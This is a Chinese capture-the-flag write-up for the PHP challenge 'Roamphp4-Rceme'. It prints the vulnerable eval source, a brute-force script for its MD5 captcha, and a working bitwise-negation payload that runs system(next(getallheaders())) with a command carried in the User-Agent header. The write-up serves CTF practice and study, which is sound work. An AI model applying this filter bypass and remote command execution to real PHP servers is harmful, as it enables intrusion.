当前位置:   article > 正文

[极客大挑战 2020]Roamphp4-Rceme_[极客大挑战 2020]roamphp4-rceme 1

[极客大挑战 2020]roamphp4-rceme 1

rce,rce,rce!!!

右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。看源码

  1. <?php
  2. error_reporting(0);
  3. session_start();
  4. if(!isset($_SESSION['code'])){
  5. $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
  6. //获得验证数字
  7. }
  8. if(isset($_POST['cmd']) and isset($_POST['code'])){
  9. if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
  10. //post传的code经过md5加密前五个字符,要等于session的code
  11. die('<script>alert(\'Captcha error~\');history.back()</script>');
  12. }
  13. $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
  14. $code = $_POST['cmd'];
  15. if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
  16. //修正符:x 将模式中的空白忽略;
  17. die('<script>alert(\'Longlone not like you~\');history.back()</script>');
  18. }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
  19. @eval($code);
  20. die();
  21. }

在rce前,他有个验证。md5前五位要等于给定的五位。我直接贴py脚本

  1. import hashlib
  2. for i in range(1,10000000000000):
  3. m=hashlib.md5(str(i).encode()).hexdigest()
  4. if m[0:5]=='71304':
  5. print(i)
  6. break

然后,需要要绕过两层,多年rce经验,相信你一眼能看出。

第一层  无字母数字绕过,这里能用取反绕过,并限制长度小于70

第二层  正则匹配很明显要求无参数执行

我们由内往外构造,这里需要前置知识(贴其他大佬的吧)

前置知识:

('phpinfo')()
['phpinfo'][0]()
['phpinfo']{0}()
效果作用是一样的。

phpinfo(): [~%8F%97%8F%96%91%99%90][~%CF]();
加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]

  1. system(next(getallheaders())); //getallheaders()简单讲可以获取数包据头
  2. 我选择ua那注入
  3. 然后修改成:User-Agent: ls
  4. 代码执行后,会获取第二个字段的值,我是把us的位置手动调成第二个字段,然后执行命令

然后将恶意语句取反(怎么取反不用写了吧)

  1. [~%8C%86%8C%8B%9A%92][~%CF]([~%91%9A%87%8B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]()));
  2. //system(next(getallheaders()));

最后数据包长这样 

 

我最后多尝试了几种方法

eval(next(getallheaders())); 不彳亍

assert(next(getallheaders())); 不彳亍

passthru(next(getallheaders())); 可以

知道原因可以在评论区踢我一脚

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/765746
推荐阅读
相关标签
  

闽ICP备14008679号